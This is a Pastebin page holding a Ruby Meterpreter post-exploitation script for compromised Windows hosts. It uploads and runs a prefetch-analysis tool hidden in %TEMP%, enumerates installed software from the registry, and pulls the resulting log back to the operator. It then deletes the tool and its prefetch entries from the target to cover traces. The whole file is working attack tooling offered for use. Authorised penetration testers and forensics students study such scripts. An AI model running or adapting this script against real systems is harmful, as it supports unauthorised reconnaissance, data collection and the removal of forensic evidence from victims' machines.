Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env ruby
- #Meterpreter script for extracting information from windows prefetch folder
- #Provided by Milo at keith.lee2012[at]gmail.com
- #Verion: 0.1.0
- session = client
- host,port = session.tunnel_peer.split(':')
- # Script Options
- @@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false, "Help menu."],
- "-p" => [ false, "List Installed Programs"],
- "-c" => [ false, "Disable SHA1/MD5 checksum"],
- "-x" => [ true, "Top x Accessed Executables (Based on Prefetch folder)"],
- "-d" => [ false, "Disable lookup for software name"],
- "-l" => [ false, "Download Prefetch Folder Analysis Log"]
- )
- tmp = session.fs.file.expand_path("%TEMP%")
- imgname = sprintf("%.5d",rand(100000))
- runTop = nil
- logs = ''
- logs1 = ''
- timeoutsec = 1000
- #---------------------------------------------------------------------------------------------------------
- def readprogramlist(session)
- begin
- key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', KEY_READ)
- sfmsvals = key.enum_key
- sfmsvals.each do |test1|
- begin
- key2 = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\"+test1
- root_key2, base_key2 = session.sys.registry.splitkey(key2)
- value1 = "DisplayName"
- value2 = "DisplayVersion"
- open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ)
- v1 = open_key.query_value(value1)
- v2 = open_key.query_value(value2)
- print_status("#{v1.data}\t(Version: #{v2.data})")
- rescue
- end
- end
- end
- end
- def prefetchdump(session,tmp,imgname,options,logs1,timeoutsec)
- tmpout = []
- prefetchexe = File.join(Msf::Config.install_root, "data", "prefetch.exe")
- prefetchlog = sprintf("%.5d",rand(100000))
- print_status("Uploading Prefetch-tool for analyzing Prefetch folder....")
- begin
- session.fs.file.upload_file("#{tmp}\\#{prefetchlog}.exe","#{prefetchexe}")
- print_status("Prefetch-tool uploaded as #{tmp}\\#{prefetchlog}.exe")
- rescue::Exception => e
- print_status("The following Error was encountered: #{e.class} #{e}")
- end
- session.response_timeout=timeoutsec
- if logs1!=''
- session = client
- host,port = session.tunnel_peer.split(':')
- logs = ::File.join(Msf::Config.config_directory, 'logs', 'prefetch', host + "-"+ ::Time.now.strftime("%Y%m%d.%M%S"))
- ::FileUtils.mkdir_p(logs)
- print "[*] Saving prefetch logs to #{tmp}\\#{imgname} "
- end
- begin
- r = session.sys.process.execute("cmd.exe /c #{tmp}\\#{prefetchlog}.exe #{options} #{logs1}.txt", nil, {'Hidden' => 'true','Channelized' => true})
- while(d = r.channel.read)
- print_status d
- end
- sleep(2)
- prog2check = "#{prefetchlog}.exe"
- found = 0
- while found == 0
- session.sys.process.get_processes().each do |x|
- found =1
- if prog2check == (x['name'].downcase)
- print "."
- sleep(0.5)
- found = 0
- end
- end
- end
- r.channel.close
- r.close
- print "\n"
- if logs1!=""
- print_status("Finish extracting prefetch folder data")
- end
- print_status("Deleting #{prefetchlog}.exe from target...")
- session.sys.process.execute("cmd.exe /c del #{tmp}\\#{prefetchlog}.exe", nil, {'Hidden' => 'true'})
- session.sys.process.execute("cmd.exe /c del %windir%\\prefetch\\#{prefetchlog}*.pf", nil, {'Hidden' => 'true'})
- print_status("Clearing prefetch-tool prefetch entry ...")
- rescue::Exception => e
- print_status("The following error was encountered: #{e.class} #{e}")
- end
- return logs
- end
- #---------------------------------------------------------------------------------------------------------
- def logdown(session,tmp,imgname,logs,timeoutsec)
- session.response_timeout=timeoutsec
- print_status("Downloading prefetch-tool logs to #{logs}")
- begin
- session.fs.file.download_file("#{logs}#{::File::Separator}#{imgname}.txt", "#{tmp}\\#{imgname}.txt")
- print_status("Finished downloading prefetch-tool log")
- print_status("Deleting left over files...")
- session.sys.process.execute("cmd.exe /c del #{tmp}\\#{imgname}", nil, {'Hidden' => 'true'})
- print_status("Prefetch-tool log on target deleted")
- rescue::Exception => e
- print_status("The following Error was encountered: #{e.class} #{e}")
- end
- end
- ################## MAIN ##################
- # Parsing of Option
- checksum = 1
- inetlookup = 1
- hlp = 0
- dwld = 0
- options1 = ""
- viewPrograms = 0
- @@exec_opts.parse(args) { |opt, idx, val|
- case opt
- when "-x"
- options1 += " --x="+val
- when "-c"
- options1 += " --disable-md5 --disable-sha1"
- when "-p"
- viewPrograms = 1
- hlp = 1
- when "-d"
- options1 += " --disable-lookup"
- when "-l"
- logs1 = " --txt=#{tmp}\\#{imgname}"
- dwld = 1
- when "-h"
- hlp = 1
- print(
- "Prefetch-tool Meterpreter Script\n" +
- @@exec_opts.usage
- )
- break
- end
- }
- if (viewPrograms == 1)
- readprogramlist(session)
- end
- if (hlp == 0)
- print_status("Running Prefetch-tool Script.....")
- logs2 = prefetchdump(session,tmp,imgname,options1,logs1,timeoutsec)
- if (dwld == 1)
- logdown(session,tmp,imgname,logs2,timeoutsec)
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement